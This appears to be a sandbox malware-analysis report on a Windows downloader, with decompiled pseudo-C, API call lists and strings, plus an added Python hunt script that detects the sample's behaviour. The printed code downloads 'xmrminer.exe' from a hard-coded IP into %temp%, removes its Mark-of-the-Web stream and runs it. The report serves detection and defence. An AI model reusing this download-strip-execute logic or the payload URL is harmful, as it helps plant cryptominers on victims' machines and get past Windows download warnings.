                                                                                  0x010d1354
                                                                                  0x010d1364
                                                                                  0x00000000
                                                                                  0x010d1376
                                                                                  0x010d1180
                                                                                  0x010d1186
                                                                                  0x010d1193
                                                                                  0x010d1292
                                                                                  0x010d1299
                                                                                  0x00000000
                                                                                  0x010d1299
                                                                                  0x010d11af
                                                                                  0x010d11b5
                                                                                  0x010d11c2
                                                                                  0x010d1285
                                                                                  0x010d128c
                                                                                  0x00000000
                                                                                  0x010d128c
                                                                                  0x010d11c8
                                                                                  0x010d1213
                                                                                  0x010d1213
                                                                                  0x010d1222
                                                                                  0x010d122d
                                                                                  0x010d1246
                                                                                  0x010d1256
                                                                                  0x010d1261
                                                                                  0x010d126e
                                                                                  0x010d1273
                                                                                  0x010d127c
                                                                                  0x010d127e
                                                                                  0x010d127e
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 010D10B9
                                                                                  • srand.MSVCRT ref: 010D10C0
                                                                                  • rand.MSVCRT ref: 010D10C8
                                                                                  • Sleep.KERNELBASE ref: 010D10DF
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 010D10FD
                                                                                  • rand.MSVCRT ref: 010D1103
                                                                                  • rand.MSVCRT ref: 010D1117
                                                                                  • wsprintfW.USER32 ref: 010D113E
                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 010D1154
                                                                                  • InternetOpenUrlW.WININET(00000000,010D144E,00000000,00000000,00000000,00000000), ref: 010D1180
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 010D11AF
                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 010D11E2
                                                                                  • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 010D1213
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 010D1222
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 010D122D
                                                                                  • wsprintfW.USER32 ref: 010D1246
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 010D1256
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 010D1261
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 010D128C
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 010D1299
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 010D12A6
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 010D12B1
                                                                                  • rand.MSVCRT ref: 010D12C6
                                                                                  • Sleep.KERNELBASE ref: 010D12DD
                                                                                  • rand.MSVCRT ref: 010D12E3
                                                                                  • rand.MSVCRT ref: 010D12F7
                                                                                  • wsprintfW.USER32 ref: 010D131E
                                                                                  • URLDownloadToFileW.URLMON(00000000,010D144E,?,00000000,00000000), ref: 010D1338
                                                                                  • wsprintfW.USER32 ref: 010D1354
                                                                                  • DeleteFileW.KERNEL32(?), ref: 010D1364
                                                                                  Strings
                                                                                  • %s\%d%d.exe, xrefs: 010D1312
                                                                                  • %temp%, xrefs: 010D10F8
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 010D114F
                                                                                  • %s:Zone.Identifier, xrefs: 010D123A
                                                                                  • %s:Zone.Identifier, xrefs: 010D1348
                                                                                  • %s\%d%d.exe, xrefs: 010D1132
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: Filerand$InternetSleep$Closewsprintf$ChangeDeleteFindHandleNotificationOpen$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                  • API String ID: 1334239748-1161929716
                                                                                  • Opcode ID: 61e8f4f88b43acc80aad3b9e8a9f7a323c3292f515a87cf144ff324fe98a87da
                                                                                  • Instruction ID: b516b25f129554e3e25ab3b52ba925cd08ad48ea8712a19649f2efc8849725c9
                                                                                  • Opcode Fuzzy Hash: 61e8f4f88b43acc80aad3b9e8a9f7a323c3292f515a87cf144ff324fe98a87da
                                                                                  • Instruction Fuzzy Hash: 4661E5B5941318ABE724D760DC49FEA7B7AAF48701F048498F68D960C5DF796B80CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
Control-flow graph (flattened). Nodes: 18 10d1000-10d1060 (memset x2, CreateProcessW); 19 10d1071-10d1080; 20 10d1062-10d106f (Sleep); 21 10d10a8-10d10ab; 22 10d1088-10d1095; 23 10d1097-10d10a4 (Sleep); 24 10d10a6. Edges: 18->19, 18->20, 19->22, 20->21, 22->23, 22->24, 23->21, 24->21.
                                                                                  C-Code - Quality: 100%
			E010D1000(WCHAR* _a4) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v100;
				void* _v104;
				int _t18;
				void* _t20;

				// Launcher for the dropped file: _a4 is the full path the caller built
				// (%temp%\<rand><rand>.exe). CreateProcessW is tried first and
				// ShellExecuteW is the fallback if it fails.
				memset( &_v100, 0, 0x44);
				memset( &_v24, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 1; // STARTF_USESHOWWINDOW
				_v100.wShowWindow = 5; // SW_SHOW
				// dwCreationFlags 0x20 = NORMAL_PRIORITY_CLASS; the path is passed as the command line
				_t18 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
				if(_t18 != 1) { // CreateProcessW failed
					_t20 = ShellExecuteW(0, L"open", _a4, 0, 0, 0); // executed
					_v8 = _t20;
					_v104 = _v8;
					if(_v104 <= 0x20) { // ShellExecuteW returns a value > 32 on success
						return 0;
					}
					Sleep(0x3e8); // 1 s
					return 1;
				}
				Sleep(0x3e8); // 1 s
				return 1;
			}
Per-line instruction addresses for the listing above: 0x010d100e, 0x010d101e, 0x010d1026, 0x010d102d, 0x010d1039, 0x010d1057, 0x010d1060, 0x010d1082, 0x010d1088, 0x010d108e, 0x010d1095, 0x00000000, 0x010d10a6, 0x010d109c, 0x00000000, 0x010d10a2, 0x010d1067, 0x00000000

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 010D100E
                                                                                  • memset.MSVCRT ref: 010D101E
                                                                                  • CreateProcessW.KERNELBASE ref: 010D1057
                                                                                  • Sleep.KERNEL32(000003E8), ref: 010D1067
                                                                                  • ShellExecuteW.SHELL32(00000000,open,010D145F,00000000,00000000,00000000), ref: 010D1082
                                                                                  • Sleep.KERNEL32(000003E8), ref: 010D109C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                  • String ID: $D$open$Ls
                                                                                  • API String ID: 3787208655-3818384318
                                                                                  • Opcode ID: 478f75f2dcd022377708cf99225ccc4b78aa366794cf307606eb5b67c5700cf7
                                                                                  • Instruction ID: 393954b8677e45deccdf0d080334f09c5272561adfd2ce1b6ff354151243b28c
                                                                                  • Opcode Fuzzy Hash: 478f75f2dcd022377708cf99225ccc4b78aa366794cf307606eb5b67c5700cf7
                                                                                  • Instruction Fuzzy Hash: F1112171A81308BBEB20DF90DD46FED7B79AB14B01F100115FA496E2C1DAF56A04C755
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
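The two listings above show the behaviour that matters for detection: the downloader writes %temp%\<rand><rand>.exe, deletes the file's ":Zone.Identifier" alternate data stream (the Mark-of-the-Web that would otherwise trigger the download warning and SmartScreen checks), and then launches the same path through E010D1000. The following is an added example, not code from the report or from the sample: a small hunt over a constructed, simplified API trace (the "<pid> <API>(<first argument>)" line format is an assumption made for this example) that alerts when one process removes a file's Zone.Identifier stream and later launches that file, and tags paths shaped like the sample's numeric temp drops.

```python
"""Hunt for the strip-Mark-of-the-Web-then-run pattern from the listings above.

Added example, not code from the report or from the sample. It walks a
constructed, simplified API trace ("<pid> <API>(<first argument>)" per line,
an assumed format) and raises an alert when one process deletes a file's
":Zone.Identifier" stream and then launches that same file.
"""
import re
from dataclasses import dataclass

# Constructed sample trace. The paths and pids are made up; only the API
# sequence mirrors what the decompiled downloader does.
SAMPLE_TRACE = """\
7 ExpandEnvironmentStringsW(%temp%)
7 CreateFileW(C:\\Users\\user\\AppData\\Local\\Temp\\2314128917.exe)
7 WriteFile(000000FF)
7 DeleteFileW(C:\\Users\\user\\AppData\\Local\\Temp\\2314128917.exe:Zone.Identifier)
7 CreateProcessW(C:\\Users\\user\\AppData\\Local\\Temp\\2314128917.exe)
9 CreateFileW(C:\\Users\\user\\Documents\\report.docx)
9 DeleteFileW(C:\\Users\\user\\Downloads\\old.txt:Zone.Identifier)
9 ShellExecuteW(C:\\Program Files\\App\\app.exe)
"""

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\((?P<arg>[^)]*)\)\s*$")
ZONE_SUFFIX = ":zone.identifier"          # compared against lower-cased paths
LAUNCH_APIS = {"CreateProcessW", "ShellExecuteW"}
# "%s\%d%d.exe" with two MSVCRT rand() values (each 0..32767) yields a purely
# numeric 2- to 10-digit file name directly under the Temp directory.
RANDOM_TEMP_EXE_RE = re.compile(r"\\temp\\\d{2,10}\.exe$", re.IGNORECASE)


@dataclass(frozen=True)
class Event:
    pid: int
    api: str
    arg: str


def parse_trace(text: str) -> list[Event]:
    """Parse the simplified trace format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(Event(int(m["pid"]), m["api"], m["arg"]))
    return events


def is_random_temp_exe(path: str) -> bool:
    """True for names shaped like the sample's %temp%\\<rand><rand>.exe drops."""
    return RANDOM_TEMP_EXE_RE.search(path) is not None


def find_motw_strip_and_run(events: list[Event]) -> list[dict]:
    """Alert when a pid deletes <file>:Zone.Identifier and later launches <file>."""
    stripped: dict[int, set[str]] = {}   # pid -> lower-cased paths whose ADS was removed
    alerts = []
    for ev in events:
        arg = ev.arg.lower()
        if ev.api == "DeleteFileW" and arg.endswith(ZONE_SUFFIX):
            stripped.setdefault(ev.pid, set()).add(arg[: -len(ZONE_SUFFIX)])
        elif ev.api in LAUNCH_APIS and arg in stripped.get(ev.pid, set()):
            alerts.append({
                "pid": ev.pid,
                "path": ev.arg,
                "launch_api": ev.api,
                "random_temp_name": is_random_temp_exe(ev.arg),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_motw_strip_and_run(parse_trace(SAMPLE_TRACE)):
        print(f"pid {alert['pid']}: Zone.Identifier removed, then launched via "
              f"{alert['launch_api']}: {alert['path']} "
              f"(random temp name: {alert['random_temp_name']})")
```

The correlation key is the pair (pid, path): deleting a Zone.Identifier stream on its own is common for legitimate unblocking, and launching a file from %temp% is common too, but the same process doing both on the same file in sequence is the behaviour the sample shows. The numeric-name check is only a secondary indicator, since any installer can drop a numerically named file. On a live host the stream can be inspected directly with PowerShell's `Get-Item -Path <file> -Stream Zone.Identifier`, which fails for a file whose stream has been deleted.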

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 79%
                                                                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                  				CHAR* _v8;
                                                                                  				intOrPtr* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				struct _STARTUPINFOA _v96;
                                                                                  				int _v100;
                                                                                  				char** _v104;
                                                                                  				int _v108;
                                                                                  				void _v112;
                                                                                  				char** _v116;
                                                                                  				intOrPtr* _v120;
                                                                                  				intOrPtr _v124;
                                                                                  				void* _t27;
                                                                                  				intOrPtr _t36;
                                                                                  				signed int _t38;
                                                                                  				int _t40;
                                                                                  				intOrPtr* _t41;
                                                                                  				intOrPtr _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				intOrPtr* _t55;
                                                                                  				intOrPtr _t58;
                                                                                  
                                                                                  				_push(0xffffffff);
                                                                                  				_push(0x10d2300);
                                                                                  				_push(0x10d1600);
                                                                                  				_push( *[fs:0x0]);
                                                                                  				 *[fs:0x0] = _t58;
                                                                                  				_v28 = _t58 - 0x68;
                                                                                  				_v8 = 0;
                                                                                  				__set_app_type(2);
                                                                                  				 *0x10d3030 =  *0x10d3030 | 0xffffffff;
                                                                                  				 *0x10d3034 =  *0x10d3034 | 0xffffffff;
                                                                                  				 *(__p__fmode()) =  *0x10d302c;
                                                                                  				 *(__p__commode()) =  *0x10d3028;
                                                                                  				 *0x10d3038 = _adjust_fdiv;
                                                                                  				_t27 = E010D15FB( *_adjust_fdiv);
                                                                                  				if( *0x10d3010 == 0) {
                                                                                  					__setusermatherr(E010D15F8);
                                                                                  				}
                                                                                  				E010D15E6(_t27);
                                                                                  				_push(0x10d300c);
                                                                                  				_push(0x10d3008);
                                                                                  				L010D15E0();
                                                                                  				_v112 =  *0x10d3024;
                                                                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x10d3020,  &_v112);
                                                                                  				_push(0x10d3004);
                                                                                  				_push(0x10d3000);
                                                                                  				L010D15E0();
                                                                                  				_t55 =  *_acmdln;
                                                                                  				_v120 = _t55;
                                                                                  				if( *_t55 != 0x22) {
                                                                                  					while(1) {
                                                                                  						__eflags =  *_t55 - 0x20;
                                                                                  						if(__eflags <= 0) {
                                                                                  							goto L7;
                                                                                  						}
                                                                                  						_t55 = _t55 + 1;
                                                                                  						_v120 = _t55;
                                                                                  					}
                                                                                  				} else {
                                                                                  					do {
                                                                                  						_t55 = _t55 + 1;
                                                                                  						_v120 = _t55;
                                                                                  						_t42 =  *_t55;
                                                                                  					} while (_t42 != 0 && _t42 != 0x22);
                                                                                  					if( *_t55 == 0x22) {
                                                                                  						L6:
                                                                                  						_t55 = _t55 + 1;
                                                                                  						_v120 = _t55;
                                                                                  					}
                                                                                  				}
                                                                                  				L7:
                                                                                  				_t36 =  *_t55;
                                                                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				_v96.dwFlags = 0;
                                                                                  				GetStartupInfoA( &_v96); // executed
                                                                                  				_t69 = _v96.dwFlags & 0x00000001;
                                                                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                  					_t38 = 0xa;
                                                                                  				} else {
                                                                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                  				}
                                                                                  				_t40 = E010D13E0(_t69, GetModuleHandleA(0), 0, _t55, _t38); // executed
                                                                                  				_v108 = _t40;
                                                                                  				exit(_t40); // executed
                                                                                  				_t41 = _v24;
                                                                                  				_t49 =  *((intOrPtr*)( *_t41));
                                                                                  				_v124 = _t49;
                                                                                  				_push(_t41);
                                                                                  				_push(_t49);
                                                                                  				L010D15DA();
                                                                                  				return _t41;
                                                                                  			}

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                  • String ID:
                                                                                  • API String ID: 801014965-0
                                                                                  • Opcode ID: 6502ff1d0215f347a48b186dd330b851e0f4330c505c0a2dee76845486a83c1b
                                                                                  • Instruction ID: 4d48201928f43b70ea6444c280acd5746713bd5f04a8347fbc35332985cf6a9a
                                                                                  • Opcode Fuzzy Hash: 6502ff1d0215f347a48b186dd330b851e0f4330c505c0a2dee76845486a83c1b
                                                                                  • Instruction Fuzzy Hash: EF419EB1D01304EFDB35DFA8D888AA97FB9FB08710F64015AF9C29B249CB395841CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E010D13E0(void* __eflags) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _t9;
                                                                                  				int _t12;
                                                                                  
                                                                                  				Sleep(0x7d0); // executed
                                                                                  				ExpandEnvironmentStringsW(L"%userprofile%",  &_v1044, 0x104);
                                                                                  				wsprintfW( &_v524, L"%s\\wincsvns.exe",  &_v1044);
                                                                                  				_t9 = E010D1380(); // executed
                                                                                  				if((_t9 & 0x000000ff) != 0) {
                                                                                  					_t12 = PathFileExistsW( &_v524); // executed
                                                                                  					if(_t12 != 0) {
                                                                                  						E010D1000( &_v524);
                                                                                  					} else {
                                                                                  						E010D10B0(L"http://185.215.113.84/xmrminer.exe"); // executed
                                                                                  					}
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 010D13EE
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 010D1405
                                                                                  • wsprintfW.USER32 ref: 010D141E
                                                                                    • Part of subcall function 010D1380: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 010D139A
                                                                                    • Part of subcall function 010D1380: wsprintfW.USER32 ref: 010D13B3
                                                                                    • Part of subcall function 010D1380: PathFileExistsW.KERNELBASE(?), ref: 010D13C3
                                                                                  • PathFileExistsW.KERNELBASE(?), ref: 010D143A
                                                                                    • Part of subcall function 010D10B0: GetTickCount.KERNEL32 ref: 010D10B9
                                                                                    • Part of subcall function 010D10B0: srand.MSVCRT ref: 010D10C0
                                                                                    • Part of subcall function 010D10B0: rand.MSVCRT ref: 010D10C8
                                                                                    • Part of subcall function 010D10B0: Sleep.KERNELBASE ref: 010D10DF
                                                                                    • Part of subcall function 010D10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 010D10FD
                                                                                    • Part of subcall function 010D10B0: rand.MSVCRT ref: 010D1103
                                                                                    • Part of subcall function 010D10B0: rand.MSVCRT ref: 010D1117
                                                                                    • Part of subcall function 010D10B0: wsprintfW.USER32 ref: 010D113E
                                                                                    • Part of subcall function 010D10B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 010D1154
                                                                                    • Part of subcall function 010D10B0: InternetOpenUrlW.WININET(00000000,010D144E,00000000,00000000,00000000,00000000), ref: 010D1180
                                                                                    • Part of subcall function 010D10B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 010D11AF
                                                                                    • Part of subcall function 010D10B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 010D11E2
                                                                                    • Part of subcall function 010D10B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 010D1213
                                                                                    • Part of subcall function 010D10B0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 010D1222
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$EnvironmentExpandInternetStringsrandwsprintf$ExistsOpenPathSleep$ChangeCloseCountCreateFindNotificationReadTickWritesrand
                                                                                  • String ID: %s\wincsvns.exe$%userprofile%$0H+u$http://185.215.113.84/xmrminer.exe
                                                                                  • API String ID: 935485402-2946983385
                                                                                  • Opcode ID: 31b296838a75ada3a495c325b58fa02677c09e5830218584ef73c1926e3b35f9
                                                                                  • Instruction ID: ea59bf68817ebeee95e534ba51ee70c21235528a8fb1a1a7547e2a8caebc8a30
                                                                                  • Opcode Fuzzy Hash: 31b296838a75ada3a495c325b58fa02677c09e5830218584ef73c1926e3b35f9
                                                                                  • Instruction Fuzzy Hash: DFF0FCB550030977E720F7B0AC49FFA37786F04605F0489A4FAC995046FEB596D8CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Basic blocks of E010D1380 (recovered from the graph text; edges given as block → successor):
                                                                                  • Block 58: 10d1380-10d13cb (calls ExpandEnvironmentStringsW, wsprintfW) → 60, 61
                                                                                  • Block 60: 10d13cd-10d13cf → 62
                                                                                  • Block 61: 10d13d1 → 62
                                                                                  • Block 62: 10d13d3-10d13d6 (function return)
                                                                                  C-Code - Quality: 100%
                                                                                  			E010D1380() {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				int _t9;
                                                                                  
                                                                                  				ExpandEnvironmentStringsW(L"%systemdrive%",  &_v524, 0x104);
                                                                                  				wsprintfW( &_v1044, L"%s\\Program Files (x86)",  &_v524);
                                                                                  				_t9 = PathFileExistsW( &_v1044); // executed
                                                                                  				if(_t9 == 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				return 1;
                                                                                  			}

                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 010D139A
                                                                                  • wsprintfW.USER32 ref: 010D13B3
                                                                                  • PathFileExistsW.KERNELBASE(?), ref: 010D13C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExistsExpandFilePathStringswsprintf
                                                                                  • String ID: %s\Program Files (x86)$%systemdrive%$0H+u
                                                                                  • API String ID: 3337111443-1867182536
                                                                                  • Opcode ID: 2436e103576d486f713ec4d2904a3352c76b737a5005ddfb4479f9528b7776b9
                                                                                  • Instruction ID: 90cb4585884ef380edfb9739656850d246abb6237a6344f76e5bd2a4908ef307
                                                                                  • Opcode Fuzzy Hash: 2436e103576d486f713ec4d2904a3352c76b737a5005ddfb4479f9528b7776b9
                                                                                  • Instruction Fuzzy Hash: 6CE065B150030C6BDB20DA61AC49AF6776CAB00605F044598BA9482041EEF556D8CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%